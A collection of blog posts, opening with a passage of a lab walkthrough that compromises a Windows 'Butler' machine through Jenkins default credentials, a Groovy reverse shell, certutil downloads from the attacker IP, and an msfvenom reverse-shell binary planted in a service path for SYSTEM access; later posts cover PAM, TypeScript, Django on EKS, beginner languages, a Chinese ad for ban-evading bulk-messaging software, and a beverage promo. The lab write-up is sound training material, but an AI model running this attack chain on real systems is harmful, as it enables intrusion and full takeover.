- Notice that the status codes in the responses are the same, but what we are mainly focusing on is the length. From the image below, we can see a big difference in the length for jenkins-jenkins. The length difference gives us an indication that something is different, so we try that username and password on the Jenkins page.

NB- Make sure to turn off Burp Suite and FoxyProxy.

Now we go back to our Jenkins login page and input the username and password **jenkins**

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lwz7v59cmn2nuoehor0p.png)

We have successfully logged in.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/u28l7vt8xuhabbee003i.png)

Now we are trying to find a place to achieve code execution.
For that, click on manage jenkins

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lgxuil6u5ppk01psmfff.png)

And then click on script console

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aukkfjwkuzkzwdhq7fbk.png)

The script console appears to run Groovy.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qpvl9l8yu9lt5ddz4n81.png)

Search Google for a Groovy reverse shell and select the one from GitHub as seen in the image below

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/o74gnwkw29ab0zbn6bfv.png)

Now click on raw and copy it all

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ewot64t0xldwodqwlmxa.png)

Now paste it into the script console

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/uglrp8unhl9sv18z73qu.png)

Since the reverse shell script wants to use port 8044, we set up a listener using the command:

```
nc -nvlp 8044
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ntncf598tc6grsjiawet.png)

Now we need to change the local host to our attacking machine's IP address

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zbqz9ys1d0p0a0yc00yz.png)

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nphqpeg368yt929iub05.png)

Now click on run

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kdbeinq505ipx5rkubhp.png)

We have successfully popped a shell.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wu6q2ev67m28l32c8w19.png)

Input the command below to find out who we are on the system:

```
whoami
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y0zs7lum8m2smej39wiw.png)

From the image above, we can see that we are butler and we are not system admin, so we will need to do some privilege escalation. For this we will use a tool called **winpeas**. It is a privilege escalation tool for Windows.

Search Google for winpeas

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hwuf6kpul83sqbv0vkqr.png)

Select the one seen in the image above, then select the winPEAS exe file

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3rz3r1r7t4k5v8vatgm0.png)

Scroll down and click on download the latest

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8sja68qurguikobf9y84.png)

Click on winPEASx64

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cz7b1pu26dq0knxjpegf.png)

Once you have successfully downloaded it, it should be in your Downloads directory.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/o8ep8yggk64k3eutimxc.png)

Now that it has been downloaded, we need to host a web server and then fetch the file from the shell we popped. To do that, input the command below in your Downloads directory:

```
python3 -m http.server 80
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9hjmkav2kr60wb3h8wlg.png)

Then, in the tab where we popped a shell, we need to move into a directory where we know we have read and write permissions.
So input the command:

```
cd c:\users
```

Input the command:

```
dir
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p4yqadxpsa3xxrf3c5pl.png)

Now input the command:

```
cd butler
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vpabhx7ji997bcwlnlti.png)

We will put winpeas here because it is butler's home directory and we should have higher permissions for this directory. So to put the file here, input the command:

```
certutil.exe -urlcache -f http://192.168.182.129/winPEASx64.exe winpeas.exe
```

The file should download successfully and be named winpeas.exe on the Windows system. Input the command below to find the file:

```
dir
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pygz5isxpmhazr0iq07d.png)

Now we need to run winpeas, and to do that we input the command:

```
winpeas.exe
```

For this particular exploit, we are interested in finding out which services are running on the system, so scroll down to the **service information** section of the winpeas output.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lvllxyxof44o55jkdlw2.png)

The image above shows some of the services running on the Butler Windows machine.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0ho6b52tl51czj5qpd0r.png)

Out of all the services running, the WiseBoot service is the one we are interested in.

The next step is to generate some malware. We could use Metasploit to do that, but for this exploit we will do it manually using the command:

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.182.129 LPORT=7777 -f exe > wise.exe
```

NB- Make sure to change the LHOST to your Kali machine's IP address.

Once the malware has been generated, we need to host a web server and receive the file in the Windows tab in which we popped the shell.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/st6mirdhl9l6kz8udud0.png)

The image above shows that I generated the malware in my Downloads directory, so I will host the web server there using the command:

```
python3 -m http.server 80
```

NB- Make sure you have cancelled the web server we were previously hosting; use **Ctrl C** to cancel it if you haven't. If yours is still running from the first time and you do not wish to cancel it, then just do not re-host it; simply input the command to receive the wise.exe file on the Windows machine.
Next, we need to open a new tab and listen on port 7777, because that is the port we plan on using for the exploit. For that, we use the command:

```
nc -nvlp 7777
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zgvy9o8ldd8l8xsluxff.png)

Now we need to cd into the Wise directory, so input the commands:

```
cd c:\
```

```
dir
```

Then we need to go into the Program Files (x86) directory, so input the command:

```
cd Program Files (x86)
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wyin3je2lio3uaq10zfd.png)

Now cd into Wise using the command:

```
cd Wise
```

Now we want to put the wise.exe file here, so we input the command:

```
certutil -urlcache -f http://192.168.182.129/wise.exe wise.exe
```

Once it has succeeded, input the command:

```
dir
```

to confirm.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f8woavxo2nhf177im4hr.png)

We first need to stop the service running as wisebootassistant, because if we don't, we might pop a shell back as butler instead of system admin. To stop the service, input the command:

```
sc stop wisebootassistant
```

To confirm that the service has stopped, input the command:

```
sc query wisebootassistant
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bike3wgkw54ljyzo1xyo.png)

Now we need to start it using the command:

```
sc start wisebootassistant
```

We have successfully popped a shell as system.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cplkia9h12l8nypbl6s0.png)

Input the command below to confirm:

```
whoami
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2ez9fr1vjnobortgyryk.png)

and input the command below to get the system info:

```
systeminfo
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qkyb830f8xp7s1iessff.png)

## MAJOR PROBLEM YOU MIGHT FACE WHILE EXPLOITING THIS MACHINE

For some reason, the machine may keep shutting down; whenever it shuts down, make sure to turn it back on.

GOOD LUCK!!!
babsarena
1,921,505
Using PAM on Linux
What is it? Well, let's first talk about what PAM, Pluggable Authentication...
0
2024-07-12T21:00:23
https://dev.to/rafaelbonilha/usando-pam-no-linux-lp4
linux, security, logicapps, systems
# What is it?

Well, let's first talk about what **PAM**, **Pluggable Authentication Modules**, are: a set of libraries used to handle authentication, account management, and control of user resources on the system, in addition to the traditional user/group-based access system (for all the resources that support it, of course). Created in 1997, they have been available ever since for GNU/Linux and UNIX.

In almost every authentication case, PAM is involved. We normally don't interact directly with PAM's configuration files; other applications make the changes to them for you. Next, we'll show how to tell whether an application supports PAM.

# How do you know if an application supports PAM?

Just run the command ldd program, for example:

```
ldd /bin/login
```

If the *libpam* library is listed, the program was compiled with PAM support. If it is not listed, the program will need its source code changed in order to handle the authentication modules that make up PAM. Keep in mind that you will have to recompile the program after the changes so it can use PAM's features.

Most of PAM's shared modules are found in the system authentication file for local authentication and in the password authentication file for the scenario where the application listens for remote connections; these files are found in */etc/pam.d*.

# Policies in PAM

The default policy in PAM is specified in */etc/pam.d/other*, and it is applied when there is no other control file in */etc/pam.d*. The default policy is created using the *pam_unix.so* module; to create and deploy more restrictive policies, it is recommended to make changes in /etc/pam.d/other. Blocks are enforced through the *pam_deny.so* module, and log alerts are sent to syslog by the *pam_warn* module. These alerts are useful in situations where PAM modules that need the authentication service get blocked by a policy you created (keep in mind that the pam_deny.so module does not block automatically). That is why it is advisable to use pam_warn when configuring more restrictive authentication policies, so you can check for possible unintended blocks.

# Main PAM Modules

Below we list the main PAM modules and related locations.

**/etc/security**
This directory holds a collection of configuration files for specific modules, heavily used by applications that support PAM.

**/var/log/secure**
This is the log file where the vast majority of authentication and security errors are recorded; it is where the restriction policies show up.

**/usr/lib64/security**
A collection of PAM libraries that perform various authentication checks.

**/etc/pam.d**
This is where the files that applications use to validate authentication live. They define which modules are checked, with which options, and in which order. They can be added to the system when a compatible application is installed, and they are edited by other PAM-aware applications via libpam.

Now let's look at a PAM use case that brings more security to a Linux system.

# Restricting Root Access Using su

The goal is to restrict access to root via the **su** command to a limited number of users who belong to a group created specifically for that purpose. The restriction will work even if the user types the correct root password; they will simply receive an incorrect login or password message.
To do this, follow the steps below:

✔ Create a group for the users who will have root access.

✔ Edit the **/etc/pam.d/su** file. Add the line below (if it does not already exist) to the configuration file:

```
auth required pam_wheel.so group=nameofthecreatedgroup
```

What this line does is use the **pam_wheel.so** module, requiring users to belong to the created group. Save and exit the editor.

✔ Still as the root user, add the users to the group. An important tip: **add your own user first, especially if you are accessing the system remotely**. This prevents your user from being hit by the new restriction policy in case the connection is lost.

✔ Test with other users who have the root password and are not in the created group, to validate that the changes were applied correctly.

With this we've shown a bit of what PAM can do to improve the level of security and authentication on Linux/UNIX systems. Its modules allow for a much more robust environment than what per-application services can provide for authentication, hence its longevity within the Linux ecosystem, being available and in use for more than 20 years.

**References for this post:**

https://www.ibm.com/docs/pt-br/netcoolomnibus/8.1?topic=authentication-pam-unix-linux

https://www.redhat.com/sysadmin/pluggable-authentication-modules-pam

https://github.com/linux-pam/linux-pam

https://www.ibm.com/docs/pt-br/spss-statistics/29.0.0?topic=authentication-configuring-pam

https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules

https://www.linuxfromscratch.org/blfs/view/11.1/postlfs/linux-pam.html

https://www.guiafoca.org/guiaonline/seguranca/ch06s02.html
rafaelbonilha
1,921,523
JavaScript to TypeScript in React-Native Development
TypeScript in React Native: My Journey from Confusion to Clarity After a year of working...
0
2024-07-16T16:55:14
https://dev.to/rafi_barides_faa6677ba16d/javascript-to-typescript-in-react-native-development-4hd7
typescript, reactnative, mobile
## TypeScript in React Native: My Journey from Confusion to Clarity

After a year of working with JavaScript, I was encouraged to learn TypeScript as I embarked on my mobile development journey. Having a solid foundation in React made the transition to React Native smoother. However, TypeScript introduces a new level of syntax complexity. In this guide, I will outline some key differences to assist new learners in their approach. I'll also share a crucial adjustment when moving from React to React Native in terms of styling.

We'll explore these concepts through a fun project: a React Native app that fetches and displays city and state information based on a zip code.

## Embracing TypeScript

Transitioning from JavaScript to TypeScript is like leveling up. Initially, I felt a lot of internal pushback, questioning the necessity since JavaScript works fine and I felt comfortable with it. However, after jumping into learning TypeScript on Codecademy, I gained skills that make my code more reliable and maintainable. JavaScript is flexible and forgiving, which can lead to hard-to-catch bugs. TypeScript adds static types to JavaScript, helping you catch errors at compile time. This can save hours of debugging and make your code more robust. As JavaScript was the first language I learned, I didn't initially understand the benefits of rigidity. However, after diving into more languages, I now appreciate its perks.

JavaScript and TypeScript are similar, but differ in a few fundamental ways:

1. **Static Typing**: TypeScript allows you to define types for your variables, function parameters, and return values.

2. **Interfaces**: You can define custom types using interfaces.

```typescript
interface User {
  name: string;
  age: number;
}

let user: User = { name: "Rafi", age: 22 };
```

3. **Generics**: TypeScript supports generics, allowing you to create reusable and type-safe components.

```typescript
function identity<T>(arg: T): T {
  return arg;
}

let output = identity<string>("Hello");
```

4. **Type Inference**: TypeScript can infer types based on the values you assign, reducing the need for explicit type annotations.

I am reminded of my time switching from DOM manipulation to React, where I took my old DOM manipulation projects and slowly reworked them. This process helped me internalize the exact differences in approach and workflow. I think the best way to learn and internalize is with an example, so let's dive into a React Native project and see how we can mentally switch from JavaScript to TypeScript. Fetching from external APIs is always a muscle I'm trying to flex, so I'll use that as an example:

## City and State Info Fetcher

**Objective**: Create a React Native app that fetches and displays city and state information based on a zip code.

## Implementation

1. **Setup**: Initialize a new React Native project and install necessary dependencies.

```bash
npx react-native init CityInfoApp
cd CityInfoApp
npm install axios
```

2. **Create Components**: Create a component for input and displaying results.
3. **Fetch Data**: Use Axios to fetch data from an API.
4. **TypeScript Integration**: Add types for better code quality.

First, I made a "sketch" in JavaScript. I am coding both versions to highlight the differences in syntax.
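One setup note before the code: the `init` command in step 1 scaffolds a plain JavaScript project. If you would rather start with TypeScript from the beginning, a commonly used alternative (my suggestion, not part of the original walkthrough) is the TypeScript project template:

```sh
# Scaffold the project with TypeScript support from the start
npx react-native init CityInfoApp --template react-native-template-typescript
cd CityInfoApp
npm install axios
```

With setup covered, on to the sketches: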
```javascript
import React, { useState } from 'react';
import { ImageBackground, StyleSheet, Text, TextInput, TouchableOpacity, View } from 'react-native';
import { getUsersLocation } from './src/fetch-utils';

export default function App() {
  const [zipCode, setZipCode] = useState('');
  const [location, setLocation] = useState(null);
  const [error, setError] = useState(null);

  const handleSubmit = async () => {
    let urlToGrab = `http://ZiptasticAPI.com/${zipCode}`;
    try {
      const locationData = await getUsersLocation(urlToGrab);
      setLocation(locationData);
      setError(null);
    } catch (error) {
      setLocation(null);
      setError('Error getting location data');
    }
  };

  // ... JSX rendering (using the imported components) omitted in this excerpt
}
```

### Converting to TypeScript

The conversion process is straightforward. We'll start by renaming file extensions from `.js` to `.tsx`. Then, we'll add type annotations.

#### Adding Type Annotations

We'll define the types for our state and props.

```typescript
import React, { useState } from 'react';
import { ImageBackground, StyleSheet, Text, TextInput, TouchableOpacity, View } from 'react-native';
import { getUsersLocation } from './src/fetch-utils';

interface Location {
  city: string;
  state: string;
}

export default function App() {
  const [zipCode, setZipCode] = useState<string>('');
  const [location, setLocation] = useState<Location | null>(null);
  const [error, setError] = useState<string | null>(null);

  const handleSubmit = async () => {
    let urlToGrab = `http://ZiptasticAPI.com/${zipCode}`;
    try {
      const locationData = await getUsersLocation(urlToGrab);
      setLocation(locationData);
      setError(null);
    } catch (error) {
      setLocation(null);
      setError('Error getting location data');
    }
  };

  // ... JSX rendering (using the imported components) omitted in this excerpt
}
```

Now let's add some styling!

## Styling in React Native

Styling in React Native is similar to using CSS in web development but with some key differences. React Native uses a JavaScript object to define styles, which are then applied to components. There isn't a CSS file.

### Key Differences

1. **StyleSheet**: Styles are created using the `StyleSheet.create` method.
2. **Flexbox**: Layouts are managed using Flexbox, similar to CSS Flexbox but with some differences in default behavior.
3. **No Cascade**: Styles do not cascade as they do in CSS. Each component has its own styles.

#### Example Styles

Here's how I styled the app using React Native's `StyleSheet`:

```typescript
const styles = StyleSheet.create({
  background: {
    flex: 1,
    justifyContent: 'center',
    alignItems: 'center',
  },
  container: {
    flex: 1,
    alignItems: 'center',
    justifyContent: 'center',
    padding: 16,
    width: '100%',
    borderRadius: 30,
    marginTop: '-40%',
  },
  header: {
    fontSize: 24,
    color: 'white',
    marginBottom: 20,
    fontWeight: 'bold',
  },
  inputContainer: {
    backgroundColor: 'rgba(255, 255, 255, 0.6)',
    borderRadius: 10,
    padding: 20,
    alignItems: 'center',
    width: '80%',
  },
  input: {
    width: '100%',
    padding: 10,
    borderColor: 'white',
    borderWidth: 1,
    borderRadius: 25,
    marginBottom: 20,
    color: 'navy',
    backgroundColor: 'white',
  },
  button: {
    backgroundColor: '#98e9ff',
    padding: 10,
    borderRadius: 10,
  },
  buttonText: {
    color: 'white',
    fontWeight: 'bold',
  },
  result: {
    marginTop: 20,
    fontSize: 18,
    color: 'navy',
    fontWeight: 'bold',
  },
  error: {
    marginTop: 20,
    fontSize: 18,
    color: 'red',
  },
});
```

## Conclusion

Switching from JavaScript to TypeScript and styling in React Native can initially seem daunting, but the benefits are well worth the effort. TypeScript's type safety and improved code readability, combined with React Native's powerful styling capabilities, make for a robust and maintainable codebase. Happy coding!
rafi_barides_faa6677ba16d
1,921,535
Deploying a Django App to Kubernetes with Amazon ECR and EKS
Today, I'll be deploying a simple Django App to practice using Docker and Kubernetes. I have a...
0
2024-07-12T20:37:48
https://dev.to/aktran321/deploying-a-django-app-to-kubernetes-with-amazon-ecr-and-eks-3736
Today, I'll be deploying a simple Django App to practice using Docker and Kubernetes. I have a simple setup.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4n8h5mehpkwtyy5fkwps.png)

A directory with the cloned git repo and a virtual environment.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tykkpg12x5kouv9syxdg.png)

"kubesite" is the Django project.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wll87rm6wz2bzxrmv7r7.png)

And within it, I created an app that displays "Hello, world!", routed to the /hello path.

Once I verified that the application works, I created my requirements.txt file

```
pip freeze > requirements.txt
```

This lists all the dependencies within the virtual environment.

I then downloaded [Docker](https://docs.docker.com/get-docker/) and created my Dockerfile.

* `touch Dockerfile`

```
# Use the official Python image from the Docker Hub
FROM python:3.12-slim

# Set environment variables
ENV PYTHONUNBUFFERED=1

# Set the working directory
WORKDIR /app

# Copy the requirements file into the container
COPY requirements.txt /app/

# Install any needed packages specified in requirements.txt
RUN pip install --no-cache-dir -r requirements.txt

# Copy the current directory contents into the container at /app
COPY . /app/

# Expose port 8000
EXPOSE 8000

# Run the Django server
CMD ["python", "manage.py", "runserver", "0.0.0.0:8000"]
```

I run the command `docker build -t my-django-app .`, which creates the Docker image shown in the Docker Desktop application.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/uynqntx6w04fz8w4a6xc.png)

Running `docker run -p 8000:8000 my-django-app`, I can open the URL path and see that my application is successfully running on Docker.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/a9r1qaaiylj3xvuszdec.png)

Now, to deploy the application on Kubernetes, we can utilize Amazon ECR and EKS. Amazon Elastic Container Registry will store the Docker container image. Amazon Elastic Kubernetes Service deploys Kubernetes clusters and lets AWS handle control plane operations.

In my CLI, I run

```
aws ecr get-login-password --region <my-region> | docker login --username AWS --password-stdin <my-account-id>.dkr.ecr.<my-region>.amazonaws.com
```

to authenticate Docker with my ECR registry.

I run

```
docker tag my-django-app:latest <my-account-id>.dkr.ecr.<my-region>.amazonaws.com/my-django-app:latest
```

to tag the Docker image.

Finally, I push the image to ECR

```
docker push <my-account-id>.dkr.ecr.<my-region>.amazonaws.com/my-django-app:latest
```

## EKS

Now, I navigate to Amazon EKS in the AWS console and create a cluster with the name "my-django-app". I kept default settings, but also created a security group with this permission

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3zwyznqsowo0hec45ce0.png)

This will allow the Kubernetes control plane access to AWS resources.
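As an aside, if you prefer to script the cluster setup rather than click through the console, the same cluster plus a worker node group can be created with `eksctl`. This is a hedged sketch with placeholder names of my own, matching the node-group settings configured later in this walkthrough (t2.medium, min 1, max 3, desired 2), not a command from the original:

```sh
# Create the EKS cluster and a managed node group in one shot
eksctl create cluster \
  --name my-django-app \
  --region <my-region> \
  --nodegroup-name django-nodes \
  --node-type t2.medium \
  --nodes 2 --nodes-min 1 --nodes-max 3
```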
The cluster takes a while to create, but once that is finished, I connect to the EKS cluster with the following command:

```
aws eks update-kubeconfig --region <my-region> --name <my-cluster-name>
```

I created this YAML file in my project, which sets the configuration for my deployment

```
apiVersion: apps/v1
kind: Deployment
metadata:
  name: my-django-app
spec:
  replicas: 3
  selector:
    matchLabels:
      app: my-django-app
  template:
    metadata:
      labels:
        app: my-django-app
    spec:
      containers:
      - name: my-django-app
        image: <my-account-id>.dkr.ecr.<my-region>.amazonaws.com/my-django-app:latest
        ports:
        - containerPort: 8000
---
apiVersion: v1
kind: Service
metadata:
  name: my-django-app
spec:
  type: LoadBalancer
  selector:
    app: my-django-app
  ports:
  - protocol: TCP
    port: 80
    targetPort: 8000
```

I then apply the deployment to the EKS cluster

```
kubectl apply -f deployment.yaml
```

Check that the pods are running

```
kubectl get pods
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/u7sv3uv5axbl6vhrh7p2.png)

My pods are not currently running, as I need to configure a worker node group in the EKS console. I specified min=1, max=3, desired=2 using a t2.medium and a security group that allowed inbound SSH from my IP. I have to re-run the deployment and then run `kubectl get pods` again.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/80kprscgzxyci11cnbto.png)

And verify the service's external IP

```
kubectl get svc
```

I can now access my app through the IP.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/h5w8cbebric9ak550fxi.png)

And here it is!

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/axjstft2wha5qegr2bqa.png)

## Cleanup

Delete the deployment

```
kubectl delete -f deployment.yaml
```

and verify the deletion

```
kubectl get pods
kubectl get svc
```

The EKS cluster, the attached node group, and the ECR repository were deleted manually through the AWS console.

Deploying a simple Django application using Docker and Kubernetes has been a practical and useful experience. This process, from building a Docker image to pushing it to Amazon ECR and deploying it on Amazon EKS, shows how these tools work together to manage application deployment. Starting from a local setup and moving to a cloud deployment gives you a clear understanding of current DevOps practices. Cleaning up the resources afterward ensures you avoid unnecessary costs and keeps your AWS environment tidy. This project not only enhances your understanding of Docker and Kubernetes but also prepares you for deploying more complex applications in the future.
aktran321
1,921,541
Your First Programming Language: A Strategic Guide for Beginners
In today's tech-driven world, there seems to be an overwhelming number of programming languages to...
0
2024-07-12T20:08:27
https://dev.to/sharoztanveer/your-first-programming-language-a-strategic-guide-for-beginners-29ka
programming, softwareengineering, python, c
In today's tech-driven world, there seems to be an overwhelming number of programming languages to choose from. This article aims to simplify your journey into programming by guiding you on which languages to learn and in what order, ensuring you learn to program as efficiently as possible. As technology permeates every industry, programming skills are increasingly sought after in job postings. For newcomers, the abundance of resources can be both a blessing and a curse, creating confusion about where to begin. With languages like `Python`, `Rust`, `Go`, `C++`, and `JavaScript`, choosing the right one to start with can be daunting. ## Step 1: Learn How Computers Work with C The first step in your programming journey should be understanding how computers operate, and the best language for this is C. Despite being considered low-level and seemingly outdated, C offers invaluable insights into the inner workings of computers. It teaches you about memory management, registers, and the processor's functions, providing a solid foundation for all future programming endeavours. C can be challenging and prone to crashes, but this difficulty is a strength. It eliminates guesswork, allowing you to see exactly what your code does, and thus deepening your understanding of how computers execute programs. By working with C, you gain absolute control over the machine, learning about operating systems, kernel interfaces, and system calls. ## Step 2: Learn to Program with Python After grasping the fundamentals of computer operations with C, the next step is to learn how to program effectively. This is best achieved with an interpreted language, and Python is an excellent choice. Known for its readability and user-friendly syntax, Python allows you to focus on learning programming concepts without the distractions of low-level details. Python's extensive library support means you can easily find tools for networking, threading, and even creating ASCII art. Its versatility and simplicity make it an ideal language for learning data structures, algorithms, and other essential programming skills. ## Embrace Mistakes and Learn from Them A crucial aspect of learning to program is being comfortable with making mistakes. As a beginner, errors are inevitable, but they are also opportunities for growth. Adopting the mindset of "failing forward" means taking each mistake as a learning experience, refining your skills with each iteration. For example, if your C program crashes due to pointer misuse, analyse the error, understand what went wrong, and apply that knowledge to become a better programmer. Persistence and a willingness to learn from failures are key to your success in programming. ## Conclusion In summary, starting with C to understand computer fundamentals, followed by Python to learn programming concepts, provides a strong foundation for any aspiring programmer. Embrace the challenges and mistakes along the way, and you'll find yourself growing and improving continuously. Happy coding! --- > [Disclosure: This article is a collaborative effort, combining my own ideas with the assistance of ChatGPT for enhanced articulation.]
sharoztanveer
1,921,544
Growing LinkedIn using AWS learnings?
Is it a good idea to share your day-to-day learning about AWS on LinkedIn? Like growing your LinkedIn...
0
2024-07-12T19:04:25
https://dev.to/newjourney_95874cd87b2724/growing-linkedin-using-aws-learnings-4kke
aws, learning, cloudcomputing, cloudpractitioner
Is it a good idea to share your day-to-day learning about AWS on LinkedIn? Like growing your LinkedIn account instead of writing articles?
newjourney_95874cd87b2724
1,921,545
Top 10 Easiest Karaoke Songs in Moscow
One of the most beloved and fun pastimes of today's young people (and not only them) can safely be called...
0
2024-07-12T19:05:28
https://dev.to/sevencode/top-10-samykh-lieghkikh-piesien-karaokie-v-moskvie-1ecd
One of the most beloved and fun pastimes of today's young people (and not only them) can safely be called karaoke. It is here that groups of friends, couples in love, and family members can enjoy each other's company and rest body and soul, even if you think singing is not your strong suit at all. There are a few fail-safe options for everyone. The easiest karaoke songs can set a positive mood and give every participant an unforgettable, pleasant evening.

Top easy modern songs:

- «В каждом маленьком ребёнке», from the cartoon «Обезьянки, вперед»: the playful music and chant-like delivery of the lyrics make it easy to sing without much effort;
- «Батарейка», by the band «Жуки»: a simple, cheerful song for groups of any age;
- «WWW Leningrad», by «Ленинград»: for when you want to shout a little and let off steam;
- «Я убью тебя, лодочник», by Профессор Лебединский: another option for a noisy crowd, with simple delivery, simple lyrics, and an easy rhythm;
- «Два кусочека колбаски», by «Комбинация»: an easy karaoke pick for the ladies;
- «Владивосток 2000», by «Мумий Тролль»: music that stirs nostalgia and fond memories of the 2000s;
- «Чудная долина», by Mr. Credo: a romantic song that suits both men and women;
- «Красавица», by «Фактор-2»: easy modern karaoke for fans of street style and gangster themes;
- «Мой друг», by «Машина времени»: a heartfelt, calm song for gatherings of old friends;
- «Пчеловод», by «RASA»: a song that is easy to sing at karaoke; everyone knows it, and it makes you want to sing along and dance to the beat.

Source: [monterossocafe.ru](https://monterossocafe.ru)
sevencode
1,921,546
Anti-ban sending assistant, screen-flooding customer-acquisition tool
Paper Airplane marketing and customer-acquisition system, anti-ban bulk-messaging assistant for customer acquisition, screen-flooding customer-acquisition tool. To learn about the related software, visit http://www.vst.tw ...
0
2024-07-12T19:07:18
https://dev.to/qagv_mfot_30e81d81bdc3b1a/fa-fang-feng-hao-zhu-shou-huo-ke-ba-ping-gong-ju-8a7
Paper Airplane marketing and customer-acquisition system; anti-ban bulk-messaging assistant for customer acquisition; screen-flooding customer-acquisition tool.

To learn about the related software, visit http://www.vst.tw

The Paper Airplane marketing and customer-acquisition system: redefining a new chapter in digital marketing.

In today's age of information explosion, the Paper Airplane marketing and customer-acquisition system, with its distinctive appeal and efficient performance, has become a marketing tool that many companies compete to adopt. By precisely targeting customer segments and applying big data and artificial-intelligence technology, the system pushes marketing messages with pinpoint accuracy, helping businesses acquire customers quickly and boost brand influence.

What characterizes the Paper Airplane system is its high degree of intelligence and personalization. Based on multi-dimensional data such as a user's browsing history and purchase behavior, it builds user profiles and pushes marketing content that better matches each user's interests and needs. This personalized delivery not only raises users' click-through and conversion rates, but also strengthens their awareness of, and goodwill toward, the company's brand.

In addition, the Paper Airplane system has powerful data-analysis capabilities. Through real-time monitoring and analysis of marketing campaigns, companies can keep up with market trends and changes in user demand, adjust their marketing strategy in time, and achieve more precise, more efficient marketing results.

In short, with its distinctive strengths, the Paper Airplane marketing and customer-acquisition system offers companies a brand-new marketing mindset and way of acquiring customers. In the digital-marketing field of the future, it will surely continue to play an important role and bring companies more business opportunities and success.

To learn about the related software, visit http://www.vst.tw

Tag: customer-acquisition marketing bot, customer-acquisition marketing software, customer-acquisition traffic software, customer-acquisition software, customer-acquisition follower-adding software, customer-acquisition group-control bot, customer-acquisition group-control software, customer-acquisition group control, customer-acquisition group-control expert, customer-acquisition group-control master bot, customer-acquisition group-control promotion software, customer-acquisition group-control traffic tool, customer-acquisition marketing master, customer-acquisition promotion expert
qagv_mfot_30e81d81bdc3b1a
1,921,547
Private-Label (СТМ) Beverage Production Under Your Brand
Producing beverages under your own brand can offer several advantages: Product uniqueness...
0
2024-07-12T19:07:21
https://dev.to/sevencode/proizvodstvo-napitkov-stm-pod-vashim-briendom-1hj6
Producing beverages under your own brand can offer several advantages:

1. **Product uniqueness**: You can create unique recipes and flavors that stand apart from what other brands offer. This lets you stand out in the market and attract consumers' attention.

2. **Quality control**: When producing beverages under your own brand, you can control every stage of production, from ingredient selection to packaging. This lets you guarantee high product quality.

3. **Flexible product range**: You can react quickly to changes in consumers' taste preferences and adjust your product lineup without depending on third-party suppliers.

4. **Higher margins**: Producing your own brand can help raise your business's margins, since you control all production and packaging costs.

5. **Branding**: Producing under your own brand lets you build a recognizable image and consumer loyalty to your product.

6. **Room to diversify**: With your own production line, you can expand your business by adding new beverages or even other products, which helps diversify your product portfolio.

Keep in mind, however, that producing under your own brand also requires significant investment in equipment, recipe development, marketing, and supply-chain management.

Source: [evo-stm.ru](https://evo-stm.ru)
sevencode